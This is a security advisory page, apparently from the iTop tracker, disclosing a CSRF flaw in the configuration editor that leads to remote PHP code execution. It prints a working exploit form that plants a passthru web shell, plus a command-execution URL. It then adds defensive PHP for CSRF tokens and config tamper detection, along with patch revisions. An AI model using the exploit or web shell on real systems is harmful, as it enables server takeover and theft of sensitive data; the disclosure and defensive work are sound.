Security Vulnerability reported by High-Tech Bridge Security Research Lab (https://www.htbridge.com/advisory/HTB23293)
A remote attacker who holds no iTop account can perform a CSRF attack against a logged-in administrator and thereby execute arbitrary PHP code on the vulnerable system with the privileges of the web server. Successful exploitation may allow the attacker to execute arbitrary system commands on the web server and to gain complete access to the vulnerable web application and its databases, which may contain very sensitive information.
The attacker must create a malicious web page containing the CSRF exploit code and trick a logged-in administrator into visiting it; the page then submits a forged HTTP request that appears to come from the legitimate user and permanently injects malicious PHP code into the iTop configuration file. The forged request is accepted because nothing in it, other than the administrator's session cookie that the browser attaches automatically, proves that it originated from iTop's own configuration editor form.
CSRF exploit will inject the following PHP code into iTop configuration file:
<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>
To reproduce the vulnerability, create an empty HTML file and paste the following exploit code into it:
<form action="http://[host]/env-production/itop-config/config.php?c%5Bmenu%5D=ConfigEditor" method="post" name="main">
  <input type="hidden" name="operation" value="save">
  <input type="hidden" name="prev_config" value="1">
  <input type="hidden" name="new_config" value="<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>">
  <input value="submit" id="btn" type="submit" />
</form>
Then log in to the iTop website as an administrator, open the file in your browser and submit the form. After a successful injection the attacker can run arbitrary system commands through any iTop page, for example the "/pages/UI.php" script, because the configuration file is included on every request. The link below displays the output of the "/bin/ls" command for the application's current directory:
http://[host]/pages/UI.php?cmd=ls
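As an added illustration (this is not iTop's code and not part of the HTB advisory), the script below shows the shape of a configuration-editor "save" handler that the form above can drive, next to a hardened version that demands a per-session, single-use synchronizer token. It is a standalone PHP script with hypothetical function names; the arrays standing in for $_POST and $_SESSION and the throwaway target file are constructed inline.

```php
<?php
// Added example, not code from iTop or from the advisory: a "save" handler in
// the vulnerable shape (any POST with the expected fields is honoured) beside
// one guarded by a per-session, single-use synchronizer token. Function names
// are hypothetical; $csrfPost and $session are constructed stand-ins for
// $_POST and $_SESSION so the script runs from the command line.
declare(strict_types=1);

// The fields submitted by the CSRF page from the advisory (constructed input).
$csrfPost = [
    'operation'   => 'save',
    'prev_config' => '1',
    'new_config'  => "<? if(isset(\$_GET['cmd'])) die(passthru(\$_GET['cmd'])); ?>",
];

function writeConfig(string $file, string $content): bool
{
    // The submitted text is stored verbatim in a file PHP later includes on
    // every page, so any PHP tags in it become executable code.
    return file_put_contents($file, $content) !== false;
}

// Vulnerable shape: only the session is checked. A cross-site <form> reaches
// this code because the browser attaches the administrator's session cookie
// to the forged POST, so it looks exactly like a legitimate save.
function saveConfigVulnerable(array $post, array $session, string $file): bool
{
    if (empty($session['user_is_admin']) || ($post['operation'] ?? '') !== 'save') {
        return false;
    }
    return writeConfig($file, (string) ($post['new_config'] ?? ''));
}

// Hardened shape: the form must carry a token minted for this session when the
// editor page was rendered. A third-party page cannot read it (the same-origin
// policy hides the editor's HTML from it), so it cannot forge a passing request.
function issueCsrfToken(array &$session): string
{
    $token = bin2hex(random_bytes(32));
    $session['csrf_tokens'][$token] = true;
    return $token;
}

function consumeCsrfToken(array &$session, ?string $token): bool
{
    if ($token === null || !isset($session['csrf_tokens'][$token])) {
        return false;
    }
    unset($session['csrf_tokens'][$token]); // single use, so a captured token cannot be replayed
    return true;
}

function saveConfigHardened(array $post, array &$session, string $file): bool
{
    if (empty($session['user_is_admin']) || ($post['operation'] ?? '') !== 'save') {
        return false;
    }
    if (!consumeCsrfToken($session, $post['transaction_id'] ?? null)) {
        return false; // forged or replayed request: nothing is written
    }
    return writeConfig($file, (string) ($post['new_config'] ?? ''));
}

// Walk-through with a throwaway file standing in for the configuration file.
$session = ['user_is_admin' => true];
$file = tempnam(sys_get_temp_dir(), 'cfg');

// 1. The forged POST against the vulnerable handler writes the backdoor.
saveConfigVulnerable($csrfPost, $session, $file);
$backdoored = strpos((string) file_get_contents($file), 'passthru') !== false;
echo 'vulnerable handler: ', $backdoored ? 'backdoor written' : 'clean', PHP_EOL;

// 2. The same forged POST against the hardened handler carries no token.
file_put_contents($file, '');
$accepted = saveConfigHardened($csrfPost, $session, $file);
echo 'hardened handler, forged request accepted: ', var_export($accepted, true), PHP_EOL;

// 3. A submission from the genuinely rendered form carries the token; a second
//    submission reusing the same token is treated as a replay.
$legit = ['transaction_id' => issueCsrfToken($session)] + $csrfPost;
$legit['new_config'] = "<?php\n\$MySettings = array('app_name' => 'iTop');\n";
$first  = saveConfigHardened($legit, $session, $file);
$replay = saveConfigHardened($legit, $session, $file);
echo 'hardened handler, genuine / replayed: ', var_export($first, true), ' / ', var_export($replay, true), PHP_EOL;

unlink($file);
```

Run it with `php` from the command line. The token must be emitted into the editor's own form (for example as a hidden input) and never placed in a URL or cookie, otherwise a cross-site page could obtain or trigger it; whether iTop's actual fix uses this exact mechanism is not stated on this page.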
Fix committed as:
revision [r3902] in /trunk
revision [r3904] in /branches/2.2.0
revision [r3905] in /branches/2.1.1
revision [r3906] in /branches/2.1.0
To patch your iTop, replace the file datamodels/2.x/itop-config/config.php with the version from the appropriate revision above, then run the setup again. Note that the patch only closes the CSRF hole: if an instance was already exploited, the injected PHP remains in the configuration file (conf/production/config-itop.php) until it is removed by hand, so inspect that file for anything that is not part of the normal settings arrays.
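As an added check (not part of iTop or of the advisory) for the case where an instance may already have been exploited before patching, the script below tokenises a configuration file and reports constructs that a legitimate config-itop.php should never contain: a second PHP open tag, a close tag, text outside PHP mode, eval/exit/include and any function call. The assumption it rests on, that the real file is a single "<?php" tag followed by plain array assignments, is stated in the code; the two sample sources are constructed, and function names are hypothetical.

```php
<?php
// Added example, not iTop code: a tamper check for an iTop configuration file.
// Assumption: a legitimate config-itop.php is one "<?php" tag followed by array
// assignments ($MySettings and friends) and comments, with no function calls,
// no close tag and no text outside PHP. Anything else is reported with its line.
// The two sample sources at the bottom are constructed; review findings by hand.
declare(strict_types=1);

// Next token text after $from, skipping whitespace and comments.
function nextSignificant(array $tokens, int $from): ?string
{
    for ($n = count($tokens); $from < $n; $from++) {
        $t = $tokens[$from];
        if (is_array($t) && in_array($t[0], [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true)) {
            continue;
        }
        return is_array($t) ? $t[1] : $t;
    }
    return null;
}

function findSuspiciousConstructs(string $phpSource): array
{
    $findings = [];
    $tokens = token_get_all($phpSource);
    $openTags = 0;
    foreach ($tokens as $i => $tok) {
        if (!is_array($tok)) {
            if ($tok === '`') {
                $findings[] = 'backtick shell execution';
            }
            continue;
        }
        [$id, $text, $line] = $tok;
        switch ($id) {
            case T_OPEN_TAG:
            case T_OPEN_TAG_WITH_ECHO:
                if (++$openTags > 1) {
                    $findings[] = "line $line: additional PHP open tag";
                }
                break;
            case T_CLOSE_TAG:
                $findings[] = "line $line: PHP close tag";
                break;
            case T_INLINE_HTML:
                // With short_open_tag off, an injected "<? ... ?>" block lexes as this.
                $findings[] = "line $line: text outside PHP mode";
                break;
            case T_EVAL:
            case T_EXIT:
            case T_INCLUDE:
            case T_INCLUDE_ONCE:
            case T_REQUIRE:
            case T_REQUIRE_ONCE:
                $findings[] = "line $line: $text";
                break;
            case T_STRING:
                // An identifier followed by "(" is a function call; array(...) lexes as
                // T_ARRAY and constants such as false are not followed by "(", so a
                // clean settings file produces no hits here.
                if (nextSignificant($tokens, $i + 1) === '(') {
                    $findings[] = "line $line: call to $text()";
                }
                break;
        }
    }
    return $findings;
}

// Constructed samples: a minimal clean configuration, and the same file with the
// payload from the advisory appended to it.
$clean = "<?php\n\$MySettings = array(\n\t'app_name' => 'iTop',\n\t'db_host' => 'localhost',\n\t'debug' => false,\n);\n";
$backdoored = $clean . "<? if(isset(\$_GET['cmd'])) die(passthru(\$_GET['cmd'])); ?>\n";

foreach (['clean' => $clean, 'backdoored' => $backdoored] as $label => $source) {
    $findings = findSuspiciousConstructs($source);
    echo $label, ': ', $findings ? implode('; ', $findings) : 'nothing suspicious', PHP_EOL;
}
```

To run it against a live instance, pass `file_get_contents('conf/production/config-itop.php')` to findSuspiciousConstructs() instead of the constructed samples. A hit is a reason to read the file, not proof of compromise; a clean result only says the file matches the assumed shape, so compare it with the last known-good copy as well.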
Related
Commit r3902 (/trunk), dflaven, 2016-02-11: "#1202: Fix for a security vulnerability in the Configuration Editor."
Commit r3904 (/branches/2.2.0), dflaven, 2016-02-11: "(retrofit from trunk) #1202: Fix for a security vulnerability in the Configuration Editor."
Commit r3905 (/branches/2.1.1), dflaven, 2016-02-11: "(retrofit from trunk) #1202: Fix for a security vulnerability in the Configuration Editor."
Commit r3906 (/branches/2.1.0), dflaven, 2016-02-11: "(retrofit from trunk) #1202: Fix for a security vulnerability in the Configuration Editor."
Last edit: Denis 2016-02-11